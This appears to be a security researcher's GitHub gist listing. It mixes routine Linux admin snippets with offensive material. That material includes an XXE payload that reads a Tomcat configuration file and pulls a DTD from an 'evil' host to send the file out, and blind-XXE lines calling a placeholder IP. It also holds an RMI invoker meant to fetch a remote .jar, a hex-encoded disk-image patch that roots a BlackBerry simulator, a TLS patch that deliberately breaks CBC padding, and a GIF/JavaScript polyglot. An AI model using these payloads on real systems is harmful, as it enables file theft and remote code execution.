Etienne Stalmans staaldraad

staaldraad / setWireshark
Last active Aug 29, 2015
Run wireshark without having to be root
if [ "$1" = "" ]; then
echo "ERROR: no username supplied"
echo "Using current user"
staaldraad / vmware_installfix
Created Feb 22, 2014
VMware Workstation 10 on Fedora 20 or kernel 3.13+ systems
# Ensure all kernel headers are installed
yum install kernel-devel kernel-headers
# Make a copy of version.h to a location known to VMware
cp /usr/src/kernels/`uname -r`/include/generated/uapi/linux/version.h /lib/modules/`uname -r`/build/include/linux/
#fix vmnet build
cd /usr/lib/vmware/modules/source/
curl -o vmware-netfilter.patch
tar xf vmnet.tar
staaldraad / gist:2f0d2ba4aa6afb0dd36f
Last active Aug 29, 2015
Update kernel paths for Ubuntu + vmware-player
vmware-installer -u vmware-player
staaldraad /
Last active Aug 29, 2015
Setup crypt container
#create new file to use as container
#dd if=/dev/zero of=/out count=5000k
fallocate -l 1G /out
#create luks wrapper
cryptsetup -v -y luksFormat /out
cryptsetup luksOpen /out cryptname
cryptsetup -v status cryptname
#make into filesystem
staaldraad /
Created Jun 18, 2014
Root Blackberry Simulator
perl -i.backup -0777 -pe 's/\x69\x66\x20\x5b\x20\x22\x24\x7b\x42\x4f\x41\x52\x44\x5f\x43\x4f\x4e\x46\x49\x47\x7d\x22\x20\x21\x3d\x20\x22\x64\x65\x76\x65\x6c\x6f\x70\x65\x72\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x72\x6f\x6f\x74\x2f\x2e\x20\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x3b\x0a\x20\x20\x20\x20\x66\x69\x3b/\x63\x70\x20\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x20\x2f\x74\x6d\x70\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x36\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x3b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/g' BlackBerry10Simulator-s001.vmdk
staaldraad / xxe
Created Jul 7, 2014
XXE remote dtd
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
staaldraad /
Last active Dec 1, 2018
Quick and dirty RMI invoker
Python implementation of RMI invoker. Should try to fetch a .jar from a server we control.
Author: Etienne Stalmans <>
Version: 08/10/2014 - v0.1
import socket
import binascii
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
staaldraad / poodle-tls-go.patch
Created Dec 9, 2014
Patch Go libs for poodle-tls scan - Modified from to work with Go 1.3.3 for Linux. -- These are mods to Adam Langley's (@agl__) work.
diff -u -r b/src/pkg/crypto/tls/common.go a/src/pkg/crypto/tls/common.go
--- b/src/pkg/crypto/tls/common.go 2014-10-01 02:51:45.000000000 +0100
+++ a/src/pkg/crypto/tls/common.go 2014-12-09 13:55:55.167748499 +0000
@@ -301,6 +301,8 @@
// be used.
CurvePreferences []CurveID
+ BreakCBCPadding bool
serverInitOnce sync.Once // guards calling (*Config).serverInit
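Review bot: the new exported `BreakCBCPadding bool` field in `Config` (common.go, added after `CurvePreferences`) has no doc comment, while the fields on either side of it are documented. Given that the name says it deliberately produces invalid CBC padding and the patch is described as being for a poodle-tls scan, add a comment stating that it exists only for scanning or testing and must stay false for normal connections. Consider also keeping it unexported or behind a build tag so that a program built against the patched library cannot set it by accident.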
staaldraad / gifjs
Created Jan 4, 2015
GIF that is also Javascript (via Ange Albertini at 31C3 -
0000000: 4749 4638 3961 2f2a 0a00 00ff 002c 0000 GIF89a/*.....,..
0000010: 0000 2f2a 0a00 0002 003b 2a2f 3d31 3b61 ../*.....;*/=1;a
0000020: 6c65 7274 2822 4865 6c6c 6f22 293b lert("Hello");